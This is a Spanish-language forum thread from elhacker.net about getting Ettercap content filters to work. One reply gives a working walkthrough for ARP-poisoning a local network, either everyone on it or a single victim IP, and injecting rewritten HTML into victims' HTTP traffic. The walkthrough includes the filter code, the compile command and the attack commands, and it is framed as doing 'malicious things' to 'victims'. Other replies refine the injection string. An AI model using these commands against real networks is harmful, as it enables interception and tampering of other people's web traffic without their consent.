elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

Inicio Ayuda Buscar Ingresar Registrarse
27 Mayo 2012, 16:10  

Tema destacado: [AIO elhacker.NET] Compilación herramientas análisis y desinfección malware

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking Avanzado
| | |-+  Hacking Básico (Moderadores: zhyzura, kamsky, TRICKY)
| | | |-+  Filtros en Ettercap
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Filtros en Ettercap  (Leído 4,280 veces)
Sierpe_777

Desconectado Desconectado

Ver Perfil
Filtros en Ettercap
« en: 4 Diciembre 2008, 18:43 »

Bueno haber tengo una duda, estoy actualmente probando sobre mi red con el Ettercap para windows 0.7.3, y quiero probar los filtros, sin embargo al poner filtros para cambiar alguna imagen por otra como lo muestra esta link

http://www.irongeek.com/i.php?page=security/ettercapfilter

nada mas no se deja, siempre me sale bien la pagina, aclaro no es la primera vez que uso el ettercap, estoy haciendo MITM y estoy envenenando bien a la maquina objetivo, de hecho veo los paquetes que le llegan y todo pero al momento de poner el filtro para cambiar las imagenes que recibe en su explorer no la cambia sigue mostrando la misma alguien ya ha conseguido hacer esa prueba con los filtros?
Makiz0rz

Pero guat de fak?

Ver Perfil
Re: Filtros en Ettercap
« Respuesta #1 en: 4 Diciembre 2008, 20:55 »

Te dejo unos mini-apuntes que me saqué yo de los filtros de Ettercap para que no se me olvidara como hacerlo, que, aunque basados en esa página (creo), quizás siguiéndolos desde ahí tal y como yo lo hice te sirve de algo.
Allá van (te lo copio tal cual, seguramente haya alguna que otra personajada que suelo escribir cuando me hago apuntes xD):

FILTROS ETTERCAP
         ================

Para hacerles cosas malignas a los usuarios de tu red (o incluso de su propia red, como será lo más habitual :D) hay que seguir los siguientes pasos:

1) Programar un filtro. La sintaxis es casi como C y está bastante bien explicado en man etterfilter.
   - Ejemplos:
#-----------------------------------------------------------------------------------------
      if (ip.proto == TCP && tcp.src == 80) { 
   replace("img src=", "img src=\"URL_DE_UNA_IMAGEN\" ");
   replace("IMG SRC=", "img src=\"URL_DE_UNA_IMAGEN\" ");
   msg("El filtro está siendo utilizado woooo.\n");
}
#------------------------------------------------------------------------------------------
   Se guarda en un documento de texto con extensión *.filter .
   Este filtro modifica los paquetes TCP si vienen por el puerto 80 (HTTP), cambiando el contenido del tag de HTML "img src" con la función
   replace (string a, string b). Por lo que las imágenes de todas las webs que se muestren con HTML (no sirve por ejemplo flash) se cambiarán
   por la que se haya puesto como segundo parámetro en la función. Con saber un poco de HTML se puede hacer cualquier cosa en las webs
   que visiten nuestras desafortunadas víctimas. >=D
   Lo que hace exactamente es desplazar la imagen original dentro del tag añadiendo comillas con \", por lo que el navegador la ignora y toma la que      le pongamos como verdadera.

Así se puede modificar cualquier paquete de cualquier protocolo que venga por cualquier puerto.

2) Compilarlo con etterfilter.

- etterfilter prueba.filter -o filtro_compilado.ef

3) Elegir la víctima y hacerle envenenamiento ARP ejecutando el filtro.

- Si queremos que toda la red sea víctima del filtro, ponemos:

ettercap -i eth2 -T -q -F filtro_compilado.ef -M ARP // //

* -T interfaz de texto.
         * -q quiet-mode.
         * -F usar un filtro.
         * -M man in the middle, el método que vamos a usar para interceptar los paquetes (concretamente ARP poisoning).

- Si queremos una víctima específica:
      ettercap -i eth2 -T -q -F filtro_compilado.ef -M ARP /192.168.1.2/ //

* Obviamente sustituyendo 192.168.1.2 por la ip local de la víctima.

4) Disfrutar.

Debe aparecer en la consola:

"Text only Interface activated...
Hit 'h' for inline help

El filtro está siendo utilizado woooo.
El filtro está siendo utilizado woooo.
...
..."

« Última modificación: 4 Diciembre 2008, 21:03 por Makiz0rz » En línea
antraXactive

pkg_delete sgae

Ver Perfil WWW
« Respuesta #2 en: 4 Diciembre 2008, 21:34 »

nada mas no se deja, siempre me sale bien la pagina
Eso puede ser por que en el filtro se está envenenando todas las cadenas que contienen
Código:
img src="
Quizás lo que te pase sea por que tienen algún atributo entre el img y el src, prueba con esto:
Código:
replace("src=", "src=\"http://www.irongeek.com/images/jollypwn.png\" ");

Makiz0rz

Pero guat de fak?

Ver Perfil
« Respuesta #3 en: 4 Diciembre 2008, 21:38 »

nada mas no se deja, siempre me sale bien la pagina
Eso puede ser por que en el filtro se está envenenando todas las cadenas que contienen
Código:
img src="
Quizás lo que te pase sea por que tienen algún atributo entre el img y el src, prueba con esto:
Código:
replace("src=", "src=\"http://www.irongeek.com/images/jollypwn.png\" ");

Pero eso te puede cambiar más tags que tienen el atributo "src" y no son imágenes.
Sierpe_777

Ver Perfil
« Respuesta #4 en: 5 Diciembre 2008, 15:38 »

replace("src=", "src=\"http://www.irongeek.com/images/jollypwn.png\" "); ya lo habia intentado pero nada por el comando de consola que pusiste makiz de eth01 asumo que estas en linux?

sera que la version compilada sobre windows no jale bien, porque sigo sin lograr nada

saludos espero me puedan seguir ayudando
Makiz0rz

Pero guat de fak?

Ver Perfil
« Respuesta #5 en: 5 Diciembre 2008, 20:33 »

Si, si, estaba en Linux.
Bueno pues pillate un LiveCD de Backtrack o alguno de esos que tienen esos programillas instalados y prueba a hacerlo ahi, a lo mejor el procedimiento lo haces bien pero es el Güindous el que no te deja, no lo se, yo en Güindous no he probado nada de esto xD.

Suerte
jeremy13

Ver Perfil
« Respuesta #6 en: 16 Octubre 2009, 14:44 »

Siento revivir un mensaje tan viejo pero a mi me pasa exactamente lo mismo, uso ubuntu y tengo ettercap instalado. tengo mi portatil y mi pc conectados por wifi, el mitm está bien hecho ya que puedo ver todo el tráfico de mi portátil. El problema es que cuando creo mi filtro y ejecuto el ettercap, parece hacer caso omiso de los replace("foo","bar"); y de los search(DATA.data,"foobar"); (al menos para el trafico del puerto 80)

¿alguien sabe porqué puede ser esto?

Muchas gracias.
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a: